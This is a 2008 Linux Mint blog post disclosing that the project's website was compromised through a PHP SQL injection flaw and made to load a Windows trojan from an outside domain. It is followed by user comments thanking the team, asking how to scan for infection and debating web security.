Server hacked

Written by Clem on Friday, August 15th, 2008 @ 1:09 pm | Main Topics

Our server was hacked and code was injected into it to make connections on our behalf to pinoc.org and download a trojan called JS/Tenia.d

For more information about this trojan:  http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=146254

If you visited linuxmint.com in the last two days we recommend you scan your computer to make sure this trojan isn’t present. As this attack exploited vulnerabilities within our PHP code we took the opportunity to clean it all and secure every single page against injections in the future.  Linuxmint.com is now clean and secure but we experienced almost 20 hours of downtime and we lost almost 2 days of work into fixing this.

I  personally received a lot of emails from the community, warning us about the problem. I haven’t had time to reply but I would like to thank the people who came forward. If you observe a problem in the future please do not hesitate to report it.

I’d also like to thank Michael (d00p) and Mats (husse) for the help they gave me on this. Husse, as always, catches my attention on what matters and if it wasn’t for d00p, our domain would still be  down right now. I also apologize for the downtime and for the inconvenience. Comments and questions are welcome.

97 Responses to “Server hacked”

  1. Waistless Says:

    I find it unacceptable that a distro which uses it’s website as the default homepage was left vulnerable to such an attack. Even if it is Linux, it’s no excuse for relaxed security.

  2. Mike Williams Says:

    For us noobs, how do we scan for a trojan in linux? Most of the info on the internet about linux says we don’t need an antivirus. Can you recommend an application?

  3. jungar Says:

    is it safe to browse now?

  4. jungar Says:

    how do i check for the trojan? i thought linux mint was safe, i only have clamtk antivirus. i never knew we could be infected with trojans!

  5. Steven Brady Says:

    Thanks to clem, d00p, and husse!

  6. Mark Homer Says:

    Ran avast, standard scan on entire system. No trojan found, although some files were not present.

  7. Andy B Says:

    I, for one, appreciate the honesty about items like this. All too often sites silently fix their holes and fail to inform users that anything was ever amiss.

    @jungar, this trojan targets Microsoft Windows clients, it has no effect on Linux desktop users. Any virus scanner updated in the last month will catch it on your Windows install.

  8. abdullah Says:

    Thanks men , but nothing happened at all to my system

  9. Sean Says:

    Who is pinoc.org? What about the packages?

  10. dw5437 Says:

    You have a root kit hunter in synaptic search for rkhunter

  11. Husse Says:

    You are only at risk of being infected by the trojan if you used Windows when you visited us.
    The exploit managed to install an iframe on hour site that connected to a server in Hongkong. As someone in the forum did notice this iframe could make some unwanted connections, but that did not mean you were infected (Windows users apart)

  12. Clem Says:

    jungar: Yes, it’s safe now. The site was completely cleaned out and secured.

  13. Clem Says:

    You can use clamav under Linux. As far as I’m aware the trojan can’t harm your Linux box but it can harm your Wine applications or your Windows boxes on the same network (via file-sharing for instance). Under Windows, there are loads of good anti viruses, just use your favorite one.

    Also, this attack didn’t specifically target linuxmint.com, we’re just one out of many websites which were hacked. It’s fair to assume that many other websites are still unsafe at this stage. If you browse any of them you will potentially be infected again. Be careful if you’re running Windows or Wine, or even Linux in a network where there are Windows boxes..

    I personally don’t bother with antiviruses but I’m always ready to wipe out a drive and replace the OS. If you’re not fully protected make sure to have up to date backups.

  14. Clem Says:

    Waistless: We make mistakes now and then, when we do we accept them, we communicate and we learn from them. Will we ever be hacked again? Of course we will. Soon or later another hacker will find a breach, but it won’t be the same breach. Right now we’ve looked at what was missing and we took action. You can find mistakes acceptable or unacceptable, for me what’s truly relevant is whether we let them happen again without learning from them. As to the level of acceptability, it’s entirely up to you whether you keep the default page as it is, or even keep using Linux Mint at all. We do our best to tackle problems, to report them and to communicate with our user base.

    Sean: pinoc is just one dummy domain used by the hackers to spread the trojan. The packages are fine and the repository for Elyssa is on a separate server.

  15. Sean Says:

    Sounds good, guys. It’s actually kind of ironic that win32 viruses are what we’re worrying about still. I know many of us probably have linuxmint as our homepage, for our Firefox browser on our Linux desktop. I feel safe, that’s why I use linux. Minor issue + Timely resolution = Increased confidence in Linux and Mint. Thanks a lot, guys. Keep up the good work.

  16. digital moonfish Says:

    thank you clem for your honesty and forward thinking.it is a windows/wine issue but as you say some homes have the 2 os,s.
    so i think you for the heads up and for the fix..

  17. Just_a_question Says:

    Good day to you sirs. I visited linuxmint.com yesterday using Mozilla Firefox 3.0.1 under Ubuntu Linux 8.04. Am I ok? I own also a home network that consists of my ubuntu box and a windows xp box.

  18. hms Says:

    Uh, I’m a little confused; if linux boxes aren’t affected, how exactly did it affect your server? Are you running windows on the server by any chance? I know it’s probably a dumb question, but I’m not a geek, I just like using Mint!

    Thanx,
    hms

  19. xwin78 Says:

    Clem & team,

    Thank you for being transparent, even about miscues / oversights! It’s just another reason to lOVE MINT and back the team even more!

    Thanks again

    xwin78

  20. Mage66 Says:

    Thanks for addressing this problem so quickly, and being honest about it. This shows one of the virtues of the Linux Community well.

    Thanks for a great distro, and for acting swiftly to address this problem.

  21. AvanceIT Says:

    Great job guys !

    Any site that is as popular as the Linux Mint site is going to get attacked, the attackers are hoping there are going to be vulnerable windows users using it, fortunately most are Linux Users and therefore have nothing to worry about.

    I take my hat off to you guys, it must be a constant nightmare trying to keep the hackers and attackers out !

    The great thing about this is your honesty and willingness to learn from it, fantastic attitude, there are many large organisations who could learn from your example!

    Mike.

  22. Adam Says:

    Well that explains the “connection blocked” message I got when connecting with a Windows machine to d/l a Mint CD. Of course, I am super paranoid with the windows box, so it auto-runs a Virus Scan overnight, every night… (Sadly, due a proprietary piece of software I run for storm spotting, I have have 1 Windows box since the software won’t run in WINE or VMWARE.)

    -Adam

  23. Chris Says:

    The only inconvenience to me was that I couldn’t download packages using software portal (Just completed a fresh installation of mint)

    Bit of a shock? yes.
    Put me off using Mint as a distro? hell no.

    Could I suggest adding the NoScript firefox extensions to the distro as standard? Not entirely sure if it would of helped in this case, but it would probably of highlighted the redirect and iframe.

    Chris

  24. hms Says:

    Okay, sorry, I re-read the first sentence above, I understand now that server was not infected with JS/Tenia.d, it was hacked to make connections to the download site for the trojan. Still, I’m wondering, in general terms, how the “code was injected” for the original hack, and also just for general info, what kind of server setup you’ve got.

    Thanks again,
    hms

  25. maybeway36 Says:

    Will ClamWin do the trick for Windows scanning?

  26. Acid_1 Says:

    I can say the Mint team did better than what MS would’ve done. “Our servers crashed and took 8 hours to reboot” ;) .

  27. Ariel Says:

    Thanks for fixing the problem. At least I was on a Mac, not Windows, when I tried to make the account so I don’t think I’ll have a problem with the trojan.

  28. rja Says:

    Waistless, feel free to offer to help the distro team. I’m sure they would probably appreciate committed people that want to help move both linux and the Mint distribution along. But the key word here is “committed”.

  29. slider Says:

    Geez Waistless give Clem and the guys a break! After all we are all only human. :-) LINUX MINT RULES!

    Thank you Clem and team for the good work you do! :-)

  30. hms Says:

    I want to second slider’s comment. You guys do a great job, I’m not criticizing you, I’m just curious about how it happened, is all.

    Keep up the good work,
    hms

  31. Husse Says:

    Waistless has a valid point but as the internet has grown into one large crime scene things like this will happen. Cybercrime is unfortunately not taken seriously enough….

  32. Sean Says:

    Husse: Hear, hear!

  33. Ahbrahm Says:

    yes great job on the news…it made me install Avast..but I love ML, since 3.0

  34. Dev Says:

    What files does it infect?

    or what is its filename?

    ive looked and nothing shows up…

  35. Clem Says:

    OK, so how did it happen? I’m not entirely sure.. there were no obvious traces left by the attacker (which was likely to be an automated attacker). We talked about it with d00p and since we weren’t sure, we started to think of how it could have happened.. and then we realized part of the php code we were using was vulnerable to SQL injection.

    http://en.wikipedia.org/wiki/SQL_injection

    So after d00p cleaned everything up I spent the night reviewing every single PHP script we had and I secured all the breaches I could find with intval and mysql_escape_real_string calls.

    If that was how we were hacked then it shouldn’t happen again.. not this way anyway.

    Also, I made a backup of all our scripts and I’ll be talking to d00p to automate that as well, so we can simply wipe/overwrite the filesystem the next time without cleaning things up manually (that’s to minimize the downtime and the exposition to the hack).

  36. hamburn Says:

    Thanks guys for the honesty and your fast work. Sh.t can happen.

    But I dislike you how you use of the phrase “hacker”.
    Being an old school user since the 80th, for me
    hackers are the good guys, people like you.
    For the criminals isn’t there the phrase crackers?

    Thanks for MINT again, I love it.
    The best OS I ever had.

    H.

  37. dr Says:

    are you’r severs runnins windose

  38. jungar Says:

    thank you Husse and Clem,

    We all appreciate your hard work and dedication. This is but a small stumble, I love linux mint, and will stick with it through thick and thin.

  39. Donald F. Truax Says:

    Good News:

    It’s all they can do to find a weak point in Linux Mint….they can hack your site, but, the OS is rock solid :)

    You know your doing something right when they hack your site, they just can’t stand the might of Linux Mint!!!

    Keep on kicking butt, your OS is nothing short of E X C E L L E N T :) ))

    Better than all the rest and simply the BEST Linux NOS that I’ve seen.

    Best

    _Don

    CEO TSCS Incorporated

    http://www.tscscorp.net

  40. dnmint Says:

    A good, fast response. Also the closeness, comeraderie of the Group- Developers & Users is the ‘plus’ for me using Mint.
    Thanks Clem Husse d00p.

  41. Deadguy Says:

    I too would like to thank Clem and Husse for
    being quick to act as well as inform the community of this
    attack.

    I of course, will stand behind Linux Mint 100% as always:)

  42. technosaurus Says:

    Whew – I just missed it – Luckily I’ve been working with Puppy linux for the last couple of weeks designing a puppy themed web desktop and hadn’t been to the site. In hindsight, perhaps I should have designed it for Mint first as a start page – glad to hear its fixed though.

  43. Roberto Says:

    @Clem Says:
    August 15th, 2008 at 5:29 pm

    Waistless: We make mistakes now and then, when we do we accept them, we communicate and we learn from them. Will we ever be hacked again? Of course we will. Soon or later another hacker will find a breach, but it won’t be the same breach. Right now we’ve looked at what was missing and we took action. You can find mistakes acceptable or unacceptable, for me what’s truly relevant is whether we let them happen again without learning from them. As to the level of acceptability, it’s entirely up to you whether you keep the default page as it is, or even keep using Linux Mint at all. We do our best to tackle problems, to report them and to communicate with our user base.

    Thanks Clem.

    I will not change my default home page. (2 computers – Gnome Main
    Editon 5 – Kde Ce 5 RC ) It’s up to me and i want it.
    For Debian Gnu/Linux – Main page is Debian Org.

    @Clem – Will we ever be hacked again? Of course we will.

    Yes,It can be true because we live in a cruel world.

    Fedora: no good news.
    Something going wrong with Fedora

    http://lwn.net/Articles/294188/

  44. Kurt Frank Says:

    Most unfortunate, but these things happen. A valuable reminder that no matter what OS you use, one should avoid running with Admin rights, especially when browsing the web (defence in depth strategy).

    From almost every MS security bulletin:
    “Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”
    Good advice no matter how you feel about them.

  45. ubuntuuser Says:

    Thanks for transparency!

    This SQL injection run has been going on for months and has been well publicized in security blogosphere.

    Good site to keep you in the loop with regards to major security news is Internet Storm Center isc.sans.org.

    The run targets unpatched IIS servers (for which patches have been released YEARS ago) and any website which has failed to sanitize their SQL queries.

    Sanitizing SQL queries is a basic security practise and most likely automated vulnerability scanning tools would have caught this oversight. Maybe somebody more knowledgeable about such tools could give you a recommendation.

  46. kezdeth Says:

    @Waistless Come on. It’s the internet. Crackers and script-kiddies are all around, and you can’t stop them. They won’t stop their stupid crap, and no one is safe from them. Look at it this way: Clem and the team found the attack, fixed the vulnerability, and stayed honest with us about what happened. How much more could you ask?

    It’s a great distro, and now it turns out that it has a good and honest maintainer, who isn’t afraid to admit to mistakes! (And be honest, we *all* make mistakes!)

    I, for one, will continue to stand behind and support Mint, and the team.

  47. rog Says:

    couldn’t agree more

  48. Tak178 Says:

    Hey Clem,

    Seeing as I use Mint exclusively at this point, I am relieved to hear that you were able to take care of this in such a timely fashion. You guys are truly professionals. From one Irish brother to another, thank you so much for your hard work!

  49. orgthingy Says:

    maybe this would be rude to say, but I’d be pretty happy that windows user is reading this article, freak out, and realize how windows can be hacked through a simple script :P ! well, it’s good to be honest, it will attract the insecure windows users :P

  50. Ahbrahm Says:

    My father (the resident geek) is a 71 year old retired truck driver.
    He slipstreamed his winxp/sp3 onto a cd to give away.
    He then removed win/xp from his now strictly linux box.
    He runs linuxmint elyssa 5 rc1, elyssa 5 & kanotix thorhammer rc7 on 2 drives & considers windoze a shoddy product not worth the price & linux something worth having & it is free.
    He has been running linux for 2 years.

  51. Thomas Says:

    I think I already know the answer to this, but is wine only vulnerable if my web browser is being run with wine? Or can it be affected if I’m running Firefox natively?

  52. super4pi Says:

    @Waistless:

    I find it unacceptable that you cannot distinguish between “its” and “it’s”.

  53. rbanavara Says:

    good work Clem & team. It was a relief that I use windows rarely after I started using Mint.

    I have a query though, I have a common FAT32 partition to share the files. Is there a chance of virus being dormant in this partition & affecting when I start windows?

    And I assume this wont affect NTFS partitions that are NOT mounted.

  54. Tim Says:

    Thanks Clem & Husse,
    that’s the reason I use and like so much linux MINT.

    @Waistless more popular → more hackers and nobody is perfect
    [but I'm sure they work on it ;) ]

  55. ScotLinux Says:

    Unfortunately, I do use Windows; not through choice, you understand, but by necessity (I have an ancient PC). I am, however, in the process of getting (perhaps, building?) a new PC, and I plan to make the leap to Linux, with Mint being on the shortlist of distros to try.

    Thankfully, I didn’t visit the site when affected, and I would agree with others who point out that we live in an imperfect world, and problems occur; the fact that the Mint team have been up front & honest about it, not to mention the speed with which the problem has been addressed, has bolstered Mint’s position on my distro shortlist – well done all, from a (hopefully) soon to be Linux convert.

  56. AfterEight Says:

    Thanks to ALL at Linux Mint.
    This why I moved over to Linux in the first place.
    Security, Peace of Mind, Openness / Transparency and Honesty.
    All that and the Helpfulness of it’s Members.

    Thanks again,
    AfterEight

  57. Jim Nygård Says:

    Thank you very much for the honesty, most sites refuses to inform their visitors about things like this.

    I do not have any Windows computers, so I feel pretty safe. But, thanks again for the honesty.

  58. Mathieu Says:

    @Thomas – If you were running firefox natively, your wine is in no danger.

    As for the Linux Mint team : A very big thanks to you all for being what an OS maintainer should be. Amazing how refreshing a little honesty can be. When I finish my studies, I will be making a few donations to repay the linux community for all the Microsoft free good times.

  59. Olaf Says:

    This is why I hate PHP, it gives Linux a bad rap. Most of the breakins into Linux or Unix systems are because of PHP and probably sloppy programming (SQL injection attack).

  60. Jack Says:

    just installed clamav from apt-get but dont know how to open it :S
    im using daryna kde

  61. VeN0mizer Says:

    Infecting the site with a windows based virus where the majority of the visitors are using linux…..real intelligence there ;) And we’re fearing these people….why?

  62. Zeke Carr Says:

    http://www.catb.org/~esr/faqs/hacker-howto.html
    Your site was breached by a Cracker. Hackers don’t break anything on purpose. This original treatise is not my work but proper credits are given on the link.

  63. Xanikseo Says:

    I am a little surprised that you were not aware of the possibility of SQL injection based attacks on the site. I know you want to carry on concentrating with the development of the project but perhaps someone should invest some time solely to research and fix common security holes in PHP in particular.

    Very mature to tell us about it though, clem! Little by little this honesty will attract more users I’m sure! ;)

  64. William Says:

    Thanks Clem & team for the quick heads up on this. I am a newbie to Linux and Mint and scrambled to find an anti virus program that I could use. I wound up using Kaspersky Online Scanner 7 for linux. It took almost 30 min to run but I came out clean..no virus or trojan.

    I tried to Download Clam. It downloaded somewhere? The main thing is an early warning an a clean scan. I have much to learn about Mint/Linux…..William

  65. hamburn Says:

    the only way to keep script kiddies and crackers away is to cut the line to the net. So what. They found it, they worked it out.

    Nothing to worry or wine about afterwards.

    Thanks for the team again

    H.

  66. exploder Says:

    I appreciate the honesty about what happened. We were not the only site that got hit by this. These things happen and the situation was very well handled.Thanks Clem!

  67. Randy Says:

    Hopefully this will serve as a wakeup call to increase security generally. Although I like Linux Mint, it is very disturbing that none of the packages are digitally signed. If someone had managed to compromise one of the package servers, we would all be exposed. You need to cryptographically sign all valid packages, and keep the private key completely inaccessible from the internet.

  68. Harish Says:

    Thanks to Clem and Mint Linux team for being honest and communicating this matter to everybody. Thats the difference between other corporates like M$ and the Linux community. Honestly and hardwork pays off. Keep up the good work Clem and team.

    Cheers,
    Harry

  69. Shahid Says:

    Thanks for a quick and honest response to the community. This demonstrates a responsible, efficient and well managed organization.

    As a small business, we will continue to use and support Linux Mint on all our computers.

    As a personal Linux Mint lover, I always recommend the Linux Mint OS to all my friends and anyone who expresses an interest in using or learning about the open source community.

  70. sailor Says:

    Where is the crystal clear step by step instruction what to do ?!

    Mint is a userfriendly distro, which does not claim, that you need to be a linux specialist. So please no cryptic hints like

    - we recommend you scan your computer
    - search for rkhunter
    - You can use clamav under Linux

    Please – Just a step by step instruction which every one can follow.

  71. Clint Says:

    The website uses Linux and Apache. If you want to check what a server runs just visit netcraft.com and type the name of the website for info on server. http://toolbar.netcraft.com/site_report?url=http://www.linuxmint.com

  72. DL Says:

    It is interesting how they chose to name the trojan. Taenia/tenia is a kind of tapeworm.

    http://en.wikipedia.org/wiki/Taenia_(tapeworm)

  73. ADS Says:

    According to the professionals, the scans are automated, affect primarily Linux servers and serve several purposes.

    1. To attempt to gain root on the server,
    2. To plant malicious script in the webpages which will,
    3. Perform a redirect to a “masked” website where the machine will be scanned for vulnerabilities,
    4. With the goal of obtaining URL/password associations that are valuable and/or obtaining another client machine for a botnet used spamming.

    I apologize for the length.

    The trojan is a mild one and serves the function of a “rabbit” to make everyone happy that they “found” something. That is a Windows trojan is not surprising. The vast majority of boxes in the West contain Windows. However, the trojan is a rabbit, something to “find”.What will it do if in the box? Make your anti-virus sound a klaxon horn.

    It was not script kiddies and doubtful that it was someone is out to get Mint. Husse mentioned that even the Apache server was messed up.

    Any box that is not secured is “open” to scripts if scripting is enabled. Clem gave a clue on that issue when he said that he runs the Web with an “empty” box that can be wiped and a fresh install done without tears. Of all the advice on this website, that is the best and most practical. You can do that with just an extra, clean install on a separate partition, as in dual boot or however many you want. You can even try to break one chaps record of more than 100 intallations on one box using the GRUB chainloader and not installing to MBR.

    If you have sensitive and/or critical data, do not join that box to a network (Web) over which you have no control. You control only your box while networked to the Web. At a bare minimum, if it is all in the same box, have the files encrypted, each critical folder separately. Websites are used for infections/scans because your ISP has secured (hopefully) its network to a certain degree. Consequently, it is you yourself that make the connection to a compromised network (Web) and perahps never regarded it as such – yet.

    Nearly any box can be compromised depending upon the resources of the hacker. Thousands of infected websites operate in the US daily. And, that includes websites that are huge and famous.

    If you create your own passwords, make them something that it would take NSA longer than 60 seconds to crack. Unix/Linux has been hacked for years. Think about it – a 6 month release schedule equals more “bugs” (of which some are security related) than a 12 month release schedule. Same amount of code each time, but 2 instances to make errors. Additionally, Linux is a collaborative effort that comprises a huge total of different, separate code pools. Debian has more than 20,000 application/programs available. All from different folk. Of varying abilities and even perhaps intentions.

    The Linux desktop has escaped largely because there simply aren’t enough to make it profitable to crack them. Now, in Asia, that is a different story. Which simply proves that Chinese and Japanese are not yet universal languages. Additionally, in the PRC, folk are shot for such things without regard for “ethnicity”. In the West, they are seldom even prosecuted. Many get cushy jobs as “gurus”.

    The security of your box is your responsibility. A default Linux installation is not as secure as it could be. That is why books 6 inches thick are written about Linux security. Bob Toxen has written an excellent book, although it is a bit long in the tooth. There are others.

    An example – Mint deliberately makes it easy for those who lack knowledge to make Windows volumes available for “sharing”. Automated “exposure”. I do not mean that critically but it is simply a fact. If permissions are weak, the mounted volume is open. As Linux becomes “Windows-like” it does not by default become more secure.

    Most of you can relax. You store nothing of marketable value on your boxes. However, the goal of the hack was to find URL/password associations, such as those used at commercial sites.

    If someone visited with JS off on a Windows box, were they affected? If someone visited with a Linux box with JS on, where they affected?

    This is where “affected” = “scanned” , not merely trojaned.

    Basic, inherent security in Linux rests in the Open code arrangement. If you can’t read it, then you do the “rest” of the security measures available to you and secure your box. Repeating the mantra “windoze sucks” will not secure your little box.

    Since I sat in front of this one, this from Windoze XPsp3, Noscript in Firefox 3.0.1.

    final Note – Google “WordPress security flaws” and see what comes up.

  74. Angus McBattleby Says:

    The little buggers ought to be flogged senseless for carrying on with that sort of shenanigans. I’d clout ‘em with me claymore if I got a hold of ‘em, I would.

  75. euklidis Says:

    do not worry guys. this trojan doesn’t effect linux. only windows boxes.

  76. Steve Cobbs Says:

    Congratulations Mint team for getting this out as soon as you did. I use Mint and still will continue to use it. This wasn’t one of those show stopping things you see on that O.S. out of Redmond. But with all things considered, no O.S. is 100% bullet proof but it sure beats the type of security threats MS users deal with on daily basis. This problem actually posed a 0% threat towards Linux users but the threat was big deal for users of MS Windows visiting your site at the time of threat.

    Ironically I work in an all MS PC shop when I started there. After a year I was able to convince my boss of the benefits of using Linux especially Mint. Linux has saved my bosses a** many times over. Now we have several systems that co-exist but I don’t use WINE or VirtualBox on any of them, so that I can keep them pure. Mint Team, keep doing the fine job that you are doing. I am running Elyssa (Xfce) on my very old laptop. This allowed me to dump Win98 for much more secure modern O.S. like Mint/Elyssa So I truly appreciate the fine work that you are doing.

    And yes “windoze sucks” but not at the expense of propping up Linux Mint. Governments and Universities all over the world are dumping MS because of unfair licensing schemes that lock you in and benefits MS completely. Oh did I forget to mention, the worms, viruses, trojans, spyware, malware and the rootkits.

    In hindsight this was more of settings issue than a vulnerability, an oversight in the webmaster’s scope. They took the appropriate actions immediately and shared it with the public. This is how you build confidence and trust in the Linux community.

    So which O.S. flaws poses the greater threat? The ones you find on Windows, MAC’s or Mint (Linux). Windows does have it advantages, but security is not one of them. Mint Rocks!

  77. ADS Says:

    FedoraProject “infrastructure” went “down” in about the same time frame. They have Yum back now, as of the 18th. There is still no explanation forthcoming although one is promised.

    Their “openness” is a bit tardy. Clem’s (and the Gang) was right up front.

    Curious how many others went down during that time frame.

  78. xMoDx Says:

    Virus Characteristics

    This detection covers scripts in which malicious iFrame(s) is appended to the end of a HTML page, i.e. after the tag.

    The recent variant also included Javascript obfuscated malicious iFrames. These iFrames will lead to redirection of the browser window to browser exploits that will download and execute malware on user’s computer.

  79. rbanavara Says:

    Hi Sailor, let me put together astep by step by guide (with all due disclaimers!):
    – If you just use ONLY & ONLY linux – dont bother, you are safe
    – If you dual boot with window OR share a partition / USB storage device with windows, its better to scan that for virus (If it was used / connected when you had connected to infected site).
    – From mint, install clamav (from mint install search clamav)
    – then open a Terminal & use the following:

    clamscan -r -i

    ex: clamscan -r -i /media/FAT32
    -r – search all the directories & sub directories
    -i – list only the infected files
    /media/FAT32 is the directory where my USB drive is connected to

  80. flameproof Says:

    My 2cents: Mint is a slick, hassle-free distro and I should know, I’ve tried nearly all of the majors (homepage? DistroWatch, of course) at one point or another. The folks here have done a slam-up job of providing the Open Source/GNU community and it’s followers with a clean, healthy, easy-to-install version of the most powerful OS on the planet. Thank you and thanks for caring enough to share the security glitches with us also.

    Oh, and Daryna (Fluxbox) flat-out rocks.

  81. Dutra de Lacerda Says:

    Since the release of (more or less) Thunderbird is sent by the repository NOT SIGNED,,, for that reason I never downloaded it as it should be a fake. Strange thing… now in the repository it shows doubled! Both 2 files… the bin and the gnome-connection… so 4 files appear,.. May be not if you downloaded them,

    My suggestion is to have separate servers… a working one and a copy connected to the net… But now it may be too late. The original should be build from scratch… copying what is apparent in the server,,, until in looks ok… but never exchanging NOTHING except data.

    Then the new rebuild server may be copied to the server,
    How can anyone be sure that this extreme solution is not necessary?
    You cann’t… unless such Master work system already exists to be copyed from time to time… but if it did… no time would be lost reconstructing the one connected… So…

    Hope it helps… Maybe things are not so bad… but the hability to hide control from legitimate administrators is high… and security WAS compromised and no-one can be sure to what extent… aparences are not evidence of nothing. Extreme solutions should be carried out… just in case the worse is hidden.

    A linux server is as appealing as a regular weak Windows system… specially to windows fans or whatever… so the worse must be assumed and a strategy to such scenario should always be implemented… specially in the case of an important distro as this is.

    Security is not assuming security but having a good architecture (in this case a separation from the real thing and a copy linked to the net… in between: a void!

    So in this msg you find 2 things… a warning about the repositories… and another about the present connection allowing progressing of an invasion… knowing a good invasion does not show.

    In ignorance… restart from scratch using what is apparent as a map.
    Regards,
    DuLac.

  82. sailor Says:

    thanks rbanavara for clear instruction.

    I have a plain Linux system.

    But as I use sometimes wine, I shall follow your steps. Guess it will not hurd me :-) .

  83. Dutra de Lacerda Says:

    P.S. –

    What I meant with the previous message is that linux ins MUCH safer… but NOT 100% secure as such thing does NOT exists,.. thus the suggestion for safe procedures out of control by the outside.

    About detectors: They ONLY detect what is known… not private invading tools… nor the ones that suceded not to be detected… Usually useful they are not if the target is an important one wher other tools are used. The best ones that nobody notice.

    The KNOWN detected problem MUST not be assumed as a first… but just one that was detected because it was primitive. The situation with Firefox in the repository may be evidence that what was found was in fact not a first but just the last. We have to assume the worst and take actions to avoid repetition…

    That demands a change in the usual working methods..
    Security is a process not a tool… as good as the tool may be and in this case to be linux. It is the overall process and architecture of the system that must be changed… NO CONNECTION should exist between the server with the base working copy that will feed it. The only connection should be made JUST by intermediary media… NEVER by direct wire connection.,, And the media should be cleaned by a third machine booting from CD,

    Is this secure? As a model yes… but depends on the sanity of the sources… so there’s never 100% sure… just a better confidence.

    Sorry to bring bad news… but things are as they are:
    When you are connected without a rubber you may always get a bad surprise… or be ignorant of the bad news if the invasion is a very good one and not widely available to be known and detected.

    I believe I’ve erased any mis-perceptions except one:
    - I’m not stating this is the actual scenario… Just that is a possibility we are unable to evaluate… and thus have to take in account.

    That said, compliments to everyone, and please consider the choices carefully. A good architecture for a system is a lot of work… but it’s made only once and that is not only a safe methodology… it is efficient over time as a copy is easier and faster that fighting to correct what may be found … not to mention missing what is not found.

    Cheers.
    DuLac.

  84. Stretchr Says:

    What is VERY acceptable is the way that you handled the problem and the honesty with which you addressed and informed the community. I’m afraid that we are so used to being hoodwinked, we do a double-take when a company actually admits a mistake and takes responsibility. In my book, that moves Mint way up on my confidence list. Thanks for surprising me!

    Cheers,
    Stretchr

  85. John Says:

    Hmmm, Lots of people talking about the honestly of you guys. It may have been said bunches of times already, but I gotta say it too.

    THANK YOU for being so up front and honest. The honesty just blows me away. Mint is awesome.

  86. reload Says:

    Hey guys!

    Ironically, I was downloading Linux Mint last night for the first time to try out a different distro. Are the iso’s okay to download? Thanks for all of the hard work getting things resolved! I’m sure you guys have regular day jobs as well. I’m assuming OSX is pretty much in the clear from the trojan? Anything I should check to make sure I’m not infected? I was running Leopard. Thanks again and I look forward to using your software.

  87. RMellis Says:

    damn virus. >:(

    ah well its gone :P

  88. W.T Says:

    Damn. I hope there is no backdoor C code in the distribution too. Btw, you could try this site monitoring service that specific to malware/trojan: http://hackalert.armorize.com

    Trial account supports daily scan up to 2 URLs and provides email notification.

  89. Nick Says:

    Like everyone’s said, thanks for the honesty. It takes balls to admit that you’ve got a problem or flaw. Or, the site for that matter. Now, if you could just get Microsoft included…

    Either way, you guys have it fixed, and that’s what’s important. Microsoft doesn’t like to be included in that either… hmmm. Oh well.

    Keep up the good work that’s been going into Mint. It’s been fun rooting for you guys. I’ve gotten nearly 10 “Computer Illiterate” people to dual-boot XP and Mint. All of them report that they use Mint all the time. They only use XP to play a certain game, or piece of software. For the average user, they just want to be able to use the net, check email, use Office tools, calculator, etc. Another great thing is the safety of Linux.

    Mint does all of this flawlessly. I hope to become a better programmer one day, and possibly help the Mint Community.

  90. saluztre Says:

    …am just a surfing hardy user newbie, looking around, this is one of my lucky days. finding linuxmint!

  91. Keval Says:

    Hi there,

    I am a very enthu distro experimentalist.. I am a hobby hacker as well.. I understand, even if the code is secure the server sides like IIS or apache can still be exploited… Injection is a very common thing… besides no need to panic ppl trojans are not for linux and I salute to the honesty of Clem.. Good Job… Keep Rockin’

  92. Windreaver Says:

    There is a linux version of Avast anti-virus you can install. Works super great.

    http://www.avast.com


Trackbacks & Pingbacks

  1. The Linux Mint Blog » Blog Archive » Weekly Newsletter - Issue 58 Says:

    [...] server was hacked with downtime as a consequence. This was by a “bot” that scanned the net for [...]

  2. RedHat/Fedora get totally "pwned" - Open Source - TechEnclave Says:

    [...] permalink Yeah saw that ! Even Linux Mint servers were hacked The Linux Mint Blog Blog Archive Server hacked [...]

  3. Compromesso anche il server di Linux Mint | PettiNix Says:

    [...] oltre ai server di Fedora e Red Hat, è stato compromesso anche il server di Linux Mint. Annunciato sul blog ufficiale della distribuzione, il server ha subito una injection di codice malevolo per [...]

  4. The Linux Mint Blog » Blog Archive » Server hacked (again) Says:

    [...] We’ve been hit again by this: http://www.linuxmint.com/blog/?p=235 [...]

  5. Linux Mint web site hacked! « UNIX Administratosphere Says:

    [...] that such things occur, but occur they do (what with human nature being what it is). They announced the hack on their blog. I wish the Linux Mint folks the best in their recovery. No one deserves to [...]